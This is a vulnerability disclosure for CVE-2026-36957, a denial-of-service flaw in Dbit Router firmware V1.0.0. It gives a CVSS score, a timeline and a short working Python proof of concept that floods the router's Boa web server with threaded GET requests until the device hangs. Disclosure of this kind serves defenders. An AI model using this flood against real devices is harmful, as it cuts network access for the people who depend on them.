
Proof-of-concept for CVE-2026-36957, a denial-of-service vulnerability in Dbit Router firmware via HTTP flood on the Boa web server, causing resource exhaustion and system hang.
CVE ID: CVE-2026-36957 Date: 2026-04-29 Discoverer: Kirubel Solomne Vendor: Shenzhen Dibit Network Equipment Co., Ltd. Product: Dbit Router Firmware Version: V1.0.0 CWE: CWE-400 - Uncontrolled Resource Consumption
The Dbit Router firmware V1.0.0 is vulnerable to Denial of Service via the Boa web server URI handler. By sending a high-volume flood of HTTP GET requests to non-existent URIs, an attacker can exhaust critical system resources including file descriptors and memory buffers. This results in a kernel deadlock or system hang that disables the web management portal and all routing capabilities.
CVSS v3.1 Score: 7.5 (High)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
| Metric | Value |
|---|
| Attack Vector | Network |
| Attack Complexity | Low |
| Privileges Required | None |
| User Interaction | None |
| Confidentiality Impact | None |
| Integrity Impact | None |
| Availability Impact | High |
import requests
import threading
TARGET = "http://192.168.10.1"
def flood(i):
try:
requests.get(f"{TARGET}/nonexistent_{i}", timeout=2)
except:
pass
threads = []
for i in range(1000):
t = threading.Thread(target=flood, args=(i,))
threads.append(t)
t.start()
for t in threads:
t.join()
print("Done. Check if router is still responsive.")
Expected Behavior: Server should limit connections and remain stable. Actual Behavior: Router web interface becomes unresponsive; requires manual reboot.
| Date | Event |
|---|---|
| 2026-04-29 | Vulnerability discovered |
| 2026-04-29 | Reported to MITRE |
| 2026-04-29 | CVE-2026-36957 assigned |
| 2026-04-29 | Public disclosure |